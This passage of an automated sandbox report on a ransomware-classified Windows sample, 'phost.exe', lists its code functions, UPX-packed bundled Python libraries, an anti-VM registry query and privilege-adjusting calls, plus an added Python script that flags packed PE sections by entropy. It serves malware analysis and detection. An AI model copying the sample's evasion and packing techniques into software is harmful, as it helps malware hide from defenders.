              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC836100_2_00007FF62CC83610
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC81DC40_2_00007FF62CC81DC4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC8E5E00_2_00007FF62CC8E5E0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC85DA00_2_00007FF62CC85DA0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC89F100_2_00007FF62CC89F10
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC95EEC0_2_00007FF62CC95EEC
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC888040_2_00007FF62CC88804
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC81FD00_2_00007FF62CC81FD0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC817B00_2_00007FF62CC817B0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC997980_2_00007FF62CC99798
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC8DF600_2_00007FF62CC8DF60
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC9411C0_2_00007FF62CC9411C
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC918E40_2_00007FF62CC918E4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC798700_2_00007FF62CC79870
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC83A140_2_00007FF62CC83A14
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC821D40_2_00007FF62CC821D4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC819B40_2_00007FF62CC819B4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC881540_2_00007FF62CC88154
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC909380_2_00007FF62CC90938
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC8DACC0_2_00007FF62CC8DACC
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC81BC00_2_00007FF62CC81BC0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7A34B0_2_00007FF62CC7A34B
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7AD1D0_2_00007FF62CC7AD1D
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7A4E40_2_00007FF62CC7A4E4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC909380_2_00007FF62CC90938
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC964880_2_00007FF62CC96488
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC93C800_2_00007FF62CC93C80
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC82C800_2_00007FF62CC82C80
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC95C700_2_00007FF62CC95C70
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC710001_2_00007FF62CC71000
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC969D41_2_00007FF62CC969D4
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC836101_2_00007FF62CC83610
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC81DC41_2_00007FF62CC81DC4
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC8E5E01_2_00007FF62CC8E5E0
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC85DA01_2_00007FF62CC85DA0
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC89F101_2_00007FF62CC89F10
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC95EEC1_2_00007FF62CC95EEC
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC888041_2_00007FF62CC88804
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC81FD01_2_00007FF62CC81FD0
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC817B01_2_00007FF62CC817B0
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC997981_2_00007FF62CC99798
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC8DF601_2_00007FF62CC8DF60
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC9411C1_2_00007FF62CC9411C
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC918E41_2_00007FF62CC918E4
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC798701_2_00007FF62CC79870
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC83A141_2_00007FF62CC83A14
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 74_2_00007FFD9A9E17D974_2_00007FFD9A9E17D9
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBABA0105_2_00007FF6BBCBABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE7B24105_2_00007FF6BBCE7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC0A2C105_2_00007FF6BBCC0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDAE10105_2_00007FF6BBCDAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC54C0105_2_00007FF6BBCC54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB82F0105_2_00007FF6BBCB82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC1180105_2_00007FF6BBCC1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB1884105_2_00007FF6BBCB1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBB540105_2_00007FF6BBCBB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD06D0C105_2_00007FF6BBD06D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD9D0C105_2_00007FF6BBCD9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBDD04105_2_00007FF6BBCBDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE0D20105_2_00007FF6BBCE0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF5C8C105_2_00007FF6BBCF5C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC8C30105_2_00007FF6BBCC8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD09B98105_2_00007FF6BBD09B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF4B38105_2_00007FF6BBCF4B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBCB14105_2_00007FF6BBCBCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD1AAC0105_2_00007FF6BBD1AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF5A70105_2_00007FF6BBCF5A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCEFA6C105_2_00007FF6BBCEFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF69FD105_2_00007FF6BBCF69FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB49B8105_2_00007FF6BBCB49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDD97C105_2_00007FF6BBCDD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD0104105_2_00007FF6BBCD0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD100F0105_2_00007FF6BBD100F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE8040105_2_00007FF6BBCE8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE0074105_2_00007FF6BBCE0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDC05C105_2_00007FF6BBCDC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCEC00C105_2_00007FF6BBCEC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC3030105_2_00007FF6BBCC3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD1DFD8105_2_00007FF6BBD1DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF4FE8105_2_00007FF6BBCF4FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD1AF90105_2_00007FF6BBD1AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE5F4C105_2_00007FF6BBCE5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCEAF0C105_2_00007FF6BBCEAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB9EFC105_2_00007FF6BBCB9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBCE84105_2_00007FF6BBCBCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCFEEA4105_2_00007FF6BBCFEEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCFAE50105_2_00007FF6BBCFAE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD0FE74105_2_00007FF6BBD0FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC8E68105_2_00007FF6BBCC8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBEE08105_2_00007FF6BBCBEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC1E04105_2_00007FF6BBCC1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD01DCC105_2_00007FF6BBD01DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF9D74105_2_00007FF6BBCF9D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBA504105_2_00007FF6BBCBA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF5468105_2_00007FF6BBCF5468
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDD458105_2_00007FF6BBCDD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDC3E0105_2_00007FF6BBCDC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE0374105_2_00007FF6BBCE0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC2360105_2_00007FF6BBCC2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD01314105_2_00007FF6BBD01314
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD0832C105_2_00007FF6BBD0832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCCD2C0105_2_00007FF6BBCCD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB42E0105_2_00007FF6BBCB42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF02A4105_2_00007FF6BBCF02A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBF24C105_2_00007FF6BBCBF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD7244105_2_00007FF6BBCD7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD02268105_2_00007FF6BBD02268
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCCE21C105_2_00007FF6BBCCE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF81CC105_2_00007FF6BBCF81CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD141CC105_2_00007FF6BBD141CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF2164105_2_00007FF6BBCF2164
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF190C105_2_00007FF6BBCF190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE0904105_2_00007FF6BBCE0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCED91C105_2_00007FF6BBCED91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE38E8105_2_00007FF6BBCE38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC2890105_2_00007FF6BBCC2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB8884105_2_00007FF6BBCB8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD018A8105_2_00007FF6BBD018A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC17C8105_2_00007FF6BBCC17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD67E0105_2_00007FF6BBCD67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCEA710105_2_00007FF6BBCEA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF0710105_2_00007FF6BBCF0710
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF2700105_2_00007FF6BBCF2700
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC86C4105_2_00007FF6BBCC86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD186D4105_2_00007FF6BBD186D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD07660105_2_00007FF6BBD07660
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD0260C105_2_00007FF6BBD0260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE65FC105_2_00007FF6BBCE65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDF5B0105_2_00007FF6BBCDF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCEF59C105_2_00007FF6BBCEF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC8598105_2_00007FF6BBCC8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: String function: 00007FF6BBCF49F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: String function: 00007FF6BBCC8444 appears 48 times
              Source: C:\Users\user\Desktop\phost.exeCode function: String function: 00007FF62CC72910 appears 34 times
              Source: C:\Users\user\Desktop\phost.exeCode function: String function: 00007FF62CC72710 appears 90 times
              Source: phost.exe | Static PE information: invalid certificate
              Source: rar.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: phost.exe | Binary or memory string: OriginalFilename vs phost.exe
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_queue.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs phost.exe
              Source: phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_decimal.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000000.1675471373.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameupfc.exej% vs phost.exe
              Source: phost.exe, 00000000.00000003.1675759091.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs phost.exe
              Source: phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibsslH vs phost.exe
              Source: phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_sqlite3.pyd. vs phost.exe
              Source: phost.exe | Binary or memory string: OriginalFilename vs phost.exe
              Source: phost.exe, 00000001.00000002.2185145953.00007FFE101E8000.00000004.00000001.01000000.0000000E.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2182666922.00007FFDFACA4000.00000004.00000001.01000000.0000000D.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs phost.exe
              Source: phost.exe, 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameupfc.exej% vs phost.exe
              Source: phost.exe, 00000001.00000002.2185595747.00007FFE10318000.00000004.00000001.01000000.0000000B.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2185433236.00007FFE10263000.00000004.00000001.01000000.0000000C.sdmp | Binary or memory string: OriginalFilename_sqlite3.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2186655028.00007FFE13344000.00000004.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2187193296.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs phost.exe
              Source: phost.exe, 00000001.00000002.2183688641.00007FFDFB1A9000.00000004.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs phost.exe
              Source: phost.exe, 00000001.00000002.2186219848.00007FFE130CC000.00000004.00000001.01000000.00000012.sdmp | Binary or memory string: OriginalFilename_queue.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2185833126.00007FFE1152C000.00000004.00000001.01000000.00000008.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2186051841.00007FFE126F4000.00000004.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2184876730.00007FFE0EB62000.00000004.00000001.01000000.00000010.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2181882290.00007FFDFAA5A000.00000004.00000001.01000000.00000013.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2182303838.00007FFDFAB28000.00000004.00000001.01000000.00000011.sdmp | Binary or memory string: OriginalFilenamelibsslH vs phost.exe
              Source: phost.exe, 00000001.00000002.2186390220.00007FFE1330C000.00000004.00000001.01000000.0000000F.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2184635947.00007FFDFB8A2000.00000004.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFilenamepython312.dll. vs phost.exe
              Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\phost.exe | Process created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
              Source: C:\Users\user\Desktop\phost.exe | Process created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
              Source: libcrypto-3.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
              Source: libssl-3.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
              Source: python312.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9994210643762751
              Source: sqlite3.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9971739243943192
              Source: unicodedata.pyd.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9942978533094812
              Source: classification engine | Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/60@4/3
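The five UPX1 entries above all report a ZLIB complexity of roughly 0.99, i.e. the section's bytes barely compress at all, which is what a packer leaves behind (UPX also ships an empty UPX0 section that is only populated in memory at run time). The script below is an added example, not part of the Joe Sandbox report or of the sample, that recomputes two indicators of this kind per PE section: a compressed-to-raw size ratio (assumed here to be what "ZLIB complexity" denotes; the exact formula Joe Sandbox uses is not stated on the page) and Shannon byte entropy. It contains its own minimal PE section parser, so it needs nothing beyond the standard library; the image it analyses is constructed in the script, and the 0.9 threshold and the packer section-name list are this example's own choices.

```python
"""Recompute section-level packing indicators (zlib ratio, byte entropy) for a PE image.
Added example with a constructed test image; not the sandbox's own implementation."""
import math
import random
import struct
import zlib

SECTION_FMT = "<8sIIIIIIHHI"      # IMAGE_SECTION_HEADER: name, vsize, va, rawsize, rawptr, ..., flags
PACKER_NAMES = {"UPX0", "UPX1", "UPX2", ".packed", ".aspack", ".adata"}   # assumed watch-list


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for a flat byte histogram."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Compressed size / raw size. Already-compressed data comes out near (or above) 1.0."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def parse_sections(pe: bytes):
    """DOS header -> PE signature -> COFF header -> section table; yields (name, raw bytes)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]       # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]        # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                                  # section table follows the optional header
    sections = []
    for i in range(n_sections):
        fields = struct.unpack_from(SECTION_FMT, pe, table + i * struct.calcsize(SECTION_FMT))
        name = fields[0].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = fields[3], fields[4]                      # SizeOfRawData, PointerToRawData
        sections.append((name, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def analyze(pe: bytes, complexity_threshold: float = 0.9):
    """Return {section name: (entropy, zlib complexity, suspicious)} for every section."""
    report = {}
    for name, data in parse_sections(pe):
        ent, cx = shannon_entropy(data), zlib_complexity(data)
        suspicious = (cx > complexity_threshold and ent > 7.0) or name in PACKER_NAMES
        report[name] = (ent, cx, suspicious)
    return report


def build_sample_pe() -> bytes:
    """Constructed, non-executable PE32+ image: an empty UPX0, a UPX1 filled with seeded
    pseudo-random bytes standing in for packed code, and a low-entropy .rsrc section."""
    rng = random.Random(1574326)
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    rsrc = b"RESOURCE" * 512
    sections = [(b"UPX0", b""), (b"UPX1", packed), (b".rsrc", rsrc)]
    opt_header = b"\x0b\x02" + b"\0" * 238                           # PE32+ magic, remaining fields zeroed
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                 # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(opt_header), 0x22)
    offset, table, blobs = 512, b"", b""                             # raw data starts at file offset 512
    for i, (name, data) in enumerate(sections):
        ptr = offset if data else 0
        table += struct.pack(SECTION_FMT, name, len(data) or 0x1000, 0x1000 * (i + 1),
                             len(data), ptr, 0, 0, 0, 0, 0x60000020)
        blobs += data
        offset += len(data)
    headers = dos + b"PE\0\0" + coff + opt_header + table
    return headers.ljust(512, b"\0") + blobs


if __name__ == "__main__":
    for name, (ent, cx, bad) in analyze(build_sample_pe()).items():
        print(f"{name:8s} entropy={ent:.3f} zlib_complexity={cx:.4f} {'PACKED?' if bad else ''}")
```

Run against a real dropped DLL by replacing `build_sample_pe()` with `open(path, "rb").read()`; a UPX1 section will show a ratio in the same 0.99 range the report lists, while a normal .text section sits well below it.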
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | Code function: 105_2_00007FF6BBCCCAFC GetLastError,FormatMessageW
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | Code function: 105_2_00007FF6BBCCEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | Code function: 105_2_00007FF6BBCFB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | Code function: 105_2_00007FF6BBCD3144 GetDiskFreeSpaceExW
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
